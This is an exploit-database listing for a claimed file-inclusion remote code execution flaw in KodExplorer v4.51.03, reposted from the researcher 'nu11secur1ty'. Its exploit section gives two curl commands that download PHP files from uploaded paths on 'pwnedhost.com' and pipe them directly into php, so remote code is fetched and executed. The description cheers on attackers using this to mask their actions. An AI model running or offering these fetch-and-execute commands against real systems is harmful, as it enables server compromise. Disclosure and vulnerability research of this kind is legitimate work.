Kodexplorer v4.51.03 pwnedadmin fileinclusion remote code execution (rce) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-05-05 | Type : webapps | Platform : php
This exploit / vulnerability Kodexplorer v4.51.03 pwnedadmin fileinclusion remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload

## Description:
By using this vulnerability remotely, the malicious pwned_admin can
list and manipulate all files inside the server. This is an absolutely
DANGEROUS and STUPID decision from the application owner! In this
scenario, the attacker prepares the machine for exploitation and sends
a link for remote execution by using the CURL protocol to his
supporter - another attacker. Then and he waits for execution from his
colleague, to mask his action or even more worst than ever. What a
nice hack is this! :)

STATUS: CRITICAL Vulnerability

[+]Exploit:
```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
| php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
| php

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)

## Proof and Exploit:
[href](https://streamable.com/98npd0)

## Time spend:
01:15:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Kodexplorer v4.51.03 pwnedadmin fileinclusion remote code execution (rce)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Kodexplorer v4.51.03 pwnedadmin fileinclusion remote code execution (rce) Vulnerability / Exploit